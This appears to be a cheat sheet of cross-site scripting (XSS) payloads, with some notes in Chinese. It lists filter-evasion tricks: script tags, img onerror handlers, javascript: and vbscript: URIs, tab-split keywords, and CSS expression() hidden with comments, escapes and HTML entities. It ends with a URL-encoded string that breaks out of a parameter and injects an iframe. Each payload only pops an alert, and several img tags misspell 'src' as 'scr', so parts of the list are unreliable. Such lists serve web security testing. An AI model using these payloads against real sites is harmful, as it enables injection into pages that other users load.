<script>alert("跨站")</script> (most common)
<img scr=javascript:alert("跨站")></img>
<img scr="javascript: alert(/跨站/)></img>
<img scr="javas????cript:alert(/跨站/)" width=150></img> (whitespace produced with the Tab key)
<img scr="#" onerror=alert(/跨站/)></img>
<img scr="#" style="xss:expression(alert(/xss/));"></img>
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ denotes a comment)
<img src=vbscript:msgbox ("xss")></img>
<style> input {left:expression (alert('xss'))}</style>
<div style={left:expression (alert('xss'))}></div>
<div style={left:exp/* */ression (alert('xss'))}></div>
<div style={left:\0065\0078ression (alert('xss'))}></div>
HTML entity <div style={left:&#x0065;xpression (alert('xss'))}></div>
Unicode <div style="{left:expRessioN (alert('xss'))}">
"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["